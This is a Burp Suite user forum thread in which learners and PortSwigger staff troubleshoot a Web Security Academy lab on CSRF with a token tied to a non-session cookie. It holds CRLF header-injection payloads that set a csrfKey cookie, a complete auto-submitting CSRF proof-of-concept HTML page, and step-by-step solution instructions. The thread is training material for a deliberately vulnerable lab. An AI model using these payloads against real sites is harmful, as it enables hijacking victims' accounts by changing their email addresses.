Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab: CSRF where token is tied to non-session cookie

P1N | Last updated: Jun 04, 2024 03:39PM UTC

those are also incorrectly processed by my lab, my payload in search does not read properly. Everything is fine in response, but the next request does not execute. request: GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2 response: HTTP/2 200 OK Set-Cookie: LastSearchTerm=test Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None Next request: POST /my-account/change-email HTTP/2 Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3 csrf has not changed, why?

João | Last updated: Jun 04, 2024 04:36PM UTC

I just posted my take on this issue. Let's see if anyone adds something.

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 07:28AM UTC

Hi both, I have responded to your forum post João but to confirm, yes, there are some issues following the entirety of the written solution in conjunction with the embedded browser based on some restrictions with cookies. We believe that using a normal version of Chrome should still work at this point in time, however (this is obviously subject to change in the future).

Usmonbek | Last updated: Jul 28, 2024 03:24PM UTC

Hello, I'm experiencing an issue where the carlos account generates a CSRF token only once. After testing the exploit in my browser, I couldn't deliver it to the victim user "wiener" via the attacker's exploit server because it indicates the CSRF token is invalid. I've refreshed my browser to obtain a new CSRF token, but it is not generating. Could you please assist me in resolving this issue or provide guidance on how to proceed? Thank you.

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:31PM UTC

Hi, Are you able to provide us with some details of the steps you are carrying out so that we can see exactly what you are doing?

Usmonbek | Last updated: Jul 28, 2024 07:32PM UTC

Hi again. These are steps i've taken to solve the lab: 1. Launched the "CSRF where token is tied to non-session cookie" lab. 2. Logged in to wiener's account 3. Intercepted the submit the "Update email" form request and sent the request to Burp Repeater. Example: POST /my-account/change-email HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=**************; csrfKey=************************* Content-Type: application/x-www-form-urlencoded Referer: https://LAB_ID.web-security-academy.net/my-account?id=wiener email=test%40test.de&csrf=taIQ3lsPF3IW4fs9Ll1je9c9x59f7V4U 4. Opened an incognito browser window, logged in to carlo's account and obtained a CSRF token with csrfKey by using "Developer Tools" CSRF token : CSRF Key: 5. Submitted the obtained valid CSRF token and CSRF key from wiener's account: Example: POST /my-account/change-email HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=*******************; csrfKey=<<"obtained CSRF cookie HERE">> Content-Type: application/x-www-form-urlencoded Referer: https://LAB_ID.web-security-academy.net/my-account?id=wiener email=test%40test.de&csrf=<<"obtained CSRF token here">> 6. Went back to the original browser, performed a search from the wiener's page and sent the resulting request to Burp Repeater. Example: GET /?search=hat HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=****************; csrfKey=*************************** Referer: https://LAB_ID.web-security-academy.net/ 7. Changed the GET request and sent it, and I got 200 response : GET /?search=green%0d%0aSet-Cookie:%20csrfKey=YOUR-CSRF_COOKIE HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=*************; csrfKey=****************** Referer: https://LAB_ID.web-security-academy.net/ 8. Created an exploit and tried to get again a new CSRF token and CSRF key from Carlo's account in order to use them in my exploit. In this situation, Carlo's account didn't give a new token and it was impossible to use the exploit with the oldest one because when I tried to use the exploit with the used CSRF token and CSRF key, but it gave me an error message "Invalid CSRF token". Thanks.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 08:41AM UTC

Hi, Are you able to confirm what the final exploit that you are delivering looks like?

Usmonbek | Last updated: Jul 29, 2024 12:27PM UTC

Hi, In my final exploit, I've got an exploit code from community solutions "CSRF - Lab #5 CSRF where token is tied to non-session cookie | Short Version" Rana Khalil video. <html> <!-- CSRF PoC -generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action='https://LAB_ID.web-security-academy.net/my-account/change-email' method="POST"> <input type="hidden" name="email" value="jack2%40test.ca"/> <input type="hidden" name="csrf" value="CSRF_TOKEN_HERE" /> <input type="submit" name="Submit request" /> </form> <img src="https://LAB_ID.web-security-academy.net/?search=black%0d%0aSet-Cookie:%20csrfKey=CSRF_KEY_HERE" onerror="document.forms[0].submit()"> </body>

Dominyque, PortSwigger Agent | Last updated: Jul 30, 2024 08:05AM UTC

Hi Usmonbek, If you do not URL-encode the email address and leave it as is, for example, jack2@test.ca, does this then work? Or are you getting the same issue?

Usmonbek | Last updated: Jul 30, 2024 10:59AM UTC

Hello, Thank you for your response. I’ve tested it as suggested by not URL-encoding the email address and using it as is (jack2@test.ca). However, I am still encountering the same issue: the CSRF token is still reported as invalid. It seems to me that the root of the problem may be related to the CSRF token not being regenerated for the Carlos account. Despite trying various approaches and ensuring that all details are entered correctly, the token issue persists. Could you please provide guidance on how to address this issue or confirm if this is a known problem with the lab? Thank you.

Dominyque, PortSwigger Agent | Last updated: Jul 31, 2024 07:14AM UTC

Hi Usmonbek And to confirm, are you changing the email address being used in your exploit between testing this on yourself (via the 'View exploit' functionality) and delivering the exploit to the victim user?

Usmonbek | Last updated: Jul 31, 2024 10:06AM UTC

Hi, Yes, I am changing the email address between testing and delivering the exploit.

Krya | Last updated: Jul 31, 2024 11:49AM UTC

Hi. I have same truble. With actual version of Chrome. The offered part of payload '<img src="/?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None">' isn't worked for me. Cookies are ignored by browser, they aren't sending via this request and aren't changing.

Usmonbek | Last updated: Jul 31, 2024 06:23PM UTC

Hello, I successfully resolved the lab by addressing the CSRF token problem. I generated a new CSRF token and CSRF cookie by signing in and out with the Carlos account. Here’s how I did it: 1. Logged in with the Wiener's account and submitted the "update email" form. 2. Located the request in the HTTP request tab and sent it to Burp Repeater. 3. Opened a private browser window, logged in with the Carlos account, and used the developer tools to obtain the CSRF key and CSRF token. Noted them. 4. Replaced the token and csrfKey in the "update email" form request with the ones obtained from Carlos's account, then sent the request and confirmed a 200 response. 5. Logged out of the Carlos account and closed the incognito browser. - This step was crucial for me. 6. Returned to the Wiener's account, pressed the Home button, performed a search, and sent the search request to Burp Repeater. Used the provided payload /search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None, replacing YOUR-KEY with the CSRF cookie obtained earlier. - This step was also crucial for me. 7. Opened a new private browser window, logged in again with the Carlos account, and obtained a new CSRF token and CSRF cookie. 8. Updated the email here with the new CSRF token and cookies, and then created a new payload with the latest CSRF token and cookies. 9. Delivered the payload to the target and solved the lab.

Dominyque, PortSwigger Agent | Last updated: Aug 01, 2024 07:16AM UTC

Hi Usmonbek, Thank you for sharing the steps you took to solve the lab! This will be a big help to those struggling with this :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.